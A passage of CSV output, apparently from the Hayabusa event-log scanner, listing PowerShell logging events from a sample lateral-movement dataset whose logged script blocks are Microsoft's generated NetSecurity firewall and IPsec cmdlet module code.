$__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DynamicTarget')) { [object]$__cmdletization_value = ${DynamicTarget} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DynamicTransport'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DynamicTransport'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { 
$__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DynamicTransport'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DynamicTransport'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallPortFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallPortFilter' -Alias '*'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.434 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; 
value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.434 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.435 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetFirewallPortFilter"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.436 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetFirewallPortFilter"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.472 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"#requires 
-version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetServiceFilter' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetFirewallServiceFilter { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetServiceFilter')] param( [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Service}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, 
[Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Service') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Service}) $__cmdletization_queryBuilder.FilterByProperty('ServiceName', $__cmdletization_values, $true, 'Default') } if 
($PSBoundParameters.ContainsKey('AssociatedNetFirewallRule') -and (@('ByAssociatedNetFirewallRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallRule}, 'MSFT_NetFirewallRuleFilterByService', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallServiceFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetFirewallServiceFilter' -Alias '*' function Set-NetFirewallServiceFilter { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetServiceFilter')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] 
[PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetServiceFilter')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Service}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if 
($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Service')) { [object]$__cmdletization_value = ${Service} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ServiceName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ServiceName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { 
$__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallServiceFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallServiceFilter' -Alias '*'",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.472 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetServiceFilter' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetFirewallServiceFilter { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] 
[OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetServiceFilter')] param( [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Service}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown 
= $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Service') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Service}) $__cmdletization_queryBuilder.FilterByProperty('ServiceName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallRule') -and (@('ByAssociatedNetFirewallRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallRule}, 'MSFT_NetFirewallRuleFilterByService', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallServiceFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 
'Get-NetFirewallServiceFilter' -Alias '*' function Set-NetFirewallServiceFilter { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetServiceFilter')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetServiceFilter')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Service}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { 
$__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Service')) { [object]$__cmdletization_value = ${Service} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ServiceName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ServiceName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, 
$__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallServiceFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallServiceFilter' -Alias '*'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.472 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.473 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote 
Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.473 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetFirewallServiceFilter"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.473 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetFirewallServiceFilter"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.514 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetIKEP1AuthSet' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { 
$__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function New-NetIPsecPhase1AuthSet { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] param( [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PolicyStore}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${GPOSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('ID')] [string] ${Name}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [string] ${DisplayName}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Description}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Group}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [ciminstance[]] ${Proposal}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${Default}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { 
